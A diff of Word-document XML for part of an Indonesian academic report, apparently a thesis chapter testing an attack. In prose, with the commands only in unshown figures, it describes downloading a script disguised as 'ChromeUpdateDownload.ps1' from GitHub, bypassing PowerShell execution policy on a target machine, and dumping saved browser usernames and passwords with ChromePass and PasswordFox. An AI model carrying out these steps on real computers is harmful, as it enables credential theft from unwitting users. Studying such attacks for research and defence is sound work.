+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dari Github</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Pada tahap ini akan dilakukan pengujian dengan mengunduh </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>file</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dari Github penulis yang nantinya akan digunakan selama proses penyerangan</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>. Namun</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">sebelum mengunduh </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">file </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dari Github, terlebih dahulu membuat </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">script </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">bernama b,ps1 yang berisikan perintah untuk mengunduh </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">file </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>dari Github</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">karena pada CMD tidak bisa langsung menggunakan perintah </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">wget </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>seperti yang ditampilkan pada gambar V-5.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:keepNext/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32D44227" wp14:editId="37E50AC0">
+            <wp:extent cx="4627660" cy="2422264"/>
+            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
+            <wp:docPr id="35" name="Picture 35"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId23"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4655043" cy="2436597"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="118" w:name="_Toc43194856"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar V- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Baris Perintah </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Membuat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Script </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>b.ps1</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="118"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:keepNext/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5ED9DD10" wp14:editId="1BDF6034">
+            <wp:extent cx="4572000" cy="3111356"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="37" name="Picture 37"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId24"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4588330" cy="3122469"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="2160" w:firstLine="720"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="119" w:name="_Toc43194857"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar V- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>6</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Script </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>b.ps1 Berhasil Dibuat</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="119"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve">Gambar V-6 menunjukkan bahwa </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>script</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ChromeUpdateDownload.ps1 sudah siap untuk diunduh. Saat menjalankan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">script </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">b.ps1 dan ChromeUpdateDownload.ps1, dilakukan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>execution policy bypass</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> terlebih dahulu aga</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">r dapat berjalan tanpa halangan di powershell pada perangkat target manapun. Pada Gambar V-7 ditampilkan perintah untuk menjalankan kedua </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">script </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>tersebut.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0218E382" wp14:editId="16BB818A">
+            <wp:extent cx="4603806" cy="2391218"/>
+            <wp:effectExtent l="0" t="0" r="6350" b="9525"/>
+            <wp:docPr id="38" name="Picture 38"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId25"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4632843" cy="2406300"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1440"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="120" w:name="_Toc43194858"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar V- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>7</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.  Perintah Menjalankan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Script</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Dengan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:i/>
+          <w:iCs/>
+          <w:noProof/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Execution Policy</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="120"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:tab/>
+        <w:t xml:space="preserve">Gambar V-8 berikut menampilkan hasil unduhan dari Github dengan menjalankan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>script</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> b.ps1 dan ChromeUpdateDownload.ps1 yang dijalankan pada komputer target</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14469FAB" wp14:editId="2C533516">
+            <wp:extent cx="4587903" cy="3120444"/>
+            <wp:effectExtent l="0" t="0" r="3175" b="3810"/>
+            <wp:docPr id="39" name="Picture 39"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId26"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4600380" cy="3128930"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="121" w:name="_Toc43194859"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar V- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>8</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Berhasil Mengunduh </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>File</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dari Github</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="121"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709" w:firstLine="0"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Pengujian Pengambilan Data </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Browser</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Pada pengujian tahap ini, penulis akan menjalankan program ChromePass.exe dan PasswordFox.exe untuk mengambil data </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> pada </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">browser </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">target. Selain menjalankan kedua program tersebut, pada saat yang sama </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>file</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> berformat .txt dibuat untuk menimpan data yang telah diambil dari </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>browser</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> target menggunakan perintah </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>/stext</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Gambar V-9 menampilkan perintah untuk menjalankan program dan menyimpannya dalam </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>file</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> .txt. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
